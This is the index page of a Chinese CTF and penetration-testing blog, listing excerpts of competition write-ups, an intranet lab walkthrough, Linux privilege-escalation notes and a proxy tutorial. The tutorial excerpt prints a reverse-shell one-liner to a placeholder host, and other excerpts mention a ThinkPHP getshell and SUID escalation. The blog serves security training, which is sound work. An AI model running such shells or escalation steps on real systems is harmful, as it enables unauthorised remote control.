Dr0n's blog
  • 首页
  • 时间轴
  • 分类
  • 标签
  • 关于
  • 友链
  • awd
  • tools
    CyberChef emoji-aes

awd工具开发&使用说明

文章演示版本:V4.0.0最新版本:V4.0.0最后更新日期:2025/07/01 目标生成 使用场景:在目标扫描前如果没有下发靶机地址列表,则需要自己生成一份去扫描 ip段生成 使用场景:裁判给了一个C段(192.168.10.0),所有队伍的靶机都在这个C段中,具体ip需要自己发现生成文件:ip.txt 输入192.168.10.*又或者是10.10.*.1(用*占位
2023-12-07
项目
#awd #自动化 #自研工具

2025宁波市第八届网络安全大赛初赛wp

misc吾的字节_1二维码图片等距提取像素点并将黑白转成10 123456789101112131415161718192021222324252627282930313233343536from PIL import Imagea = Image.open("five.png")x_, y_ = 0, 0w, h = a.sizeb = Image.new(a.mode, (
2025-08-17
wp
#wp #宁波 #2025竞赛

春秋云境 Initial

开始签到白嫖打完所有靶机计划! Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。 前置知识: 内网渗透学习(代理篇)内网渗透学习(横向移动篇)linux提权笔记 入口(172.22.1.15)根据报错信息得知是ThinkPHP 5,存在nday,可以getshell 写马后查看用户是 www-data
2025-07-14
内网渗透
#内网渗透 #春秋云境 #专业徽章 #DCSync

linux提权笔记

记录在比赛和靶场中遇到的提权方法 推荐本地部署一个GTFOBins用来查询 suid 提权 SUID是一种特殊权限,可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件,那么就可以在运行该文件的时候获得root用户权限 查找当前系统上文件属主为 root 并且拥有 SUID 权限的可执行文件 1234find / -user root -per
2025-05-09
总结
#总结 #提权

第八届西湖论剑中国杭州网络安全安全技能大赛初赛 部分wp

dseasydatalog分析error.log发现首先上传了木马,然后用蚁剑进行连接 全局搜索发现包含一个zip和jpg 压缩包数据很少直接手动提取出来,图片数据太多用脚本提取出来 12345678910111213141516171819202122232425262728293031323334353637383940414243444546import redef extract_jpg
2025-01-18
wp
#wp #2025竞赛 #西湖论剑

2024“中华武数杯”全国网络攻防精英赛RHG wp

第一次打RHG模式,i春秋的平台和在网上看到的不太一样,一轮是一小时,也可以手动一题一题做然后提交 写了个脚本获取题目信息然后下载,运行写好的exp然后提交flag(写不来自动分析漏洞,就人工代替ai) 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253
2024-11-30
wp
#wp #中华武数杯 #2024竞赛 #RHG

第七届浙江省大学生网络与信息安全竞赛决赛-WP

总榜Rank1,在毕业前拿到榜一也是圆满了 :) webwucanrce123456789101112131415161718<?phpecho "get只接受code欧,flag在上一级目录<br>";$filename = __FILE__;highlight_file($filename);if(isset($_GET['code']
2024-11-09
wp
#wp #2024竞赛 #浙江

第七届浙江省大学生网络与信息安全竞赛预赛-WP

签到网安知识大挑战数据存储在js中 aes解密得到flag 签到题1Base92 -> Base85 -> Base64 -> Base62 -> Base58 -> Base45 -> Base32 DASCTF{welcome_to_zjctf_2024} webhack memory访问/robot.txt得到/upload路径
2024-11-02
wp
#wp #2024竞赛 #浙江

内网渗透学习(代理篇)

本文中使用的代理工具可通过我的脚本一键下载https://github.com/dr0n1/CTF_misc_auto_deploy 反弹shell推荐在本地部署一个reverse-shell-generator,可以很方便的查看命令 以下是几个常用的 bash -i1/bin/sh -i >& /dev/tcp/1.1.1.1/8888 0>&1 nc1234567
2024-10-10
总结
#总结 #内网渗透

2024年“羊城杯”粤港澳大湾区网络安全大赛 wp

[初赛] 数据安全data-analy1恢复被打乱的数据 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import csvimport reimport pandas as pddata = pd.read_csv("person_data.csv",
2024-08-28
wp
#wp #羊城杯 #2024竞赛
123…10

搜索

Hexo Fluid
载入天数... 载入时分秒...
总访问量 次 总访客数 人
浙ICP备2022002247号 | police-icon 浙公网安备33021202003790号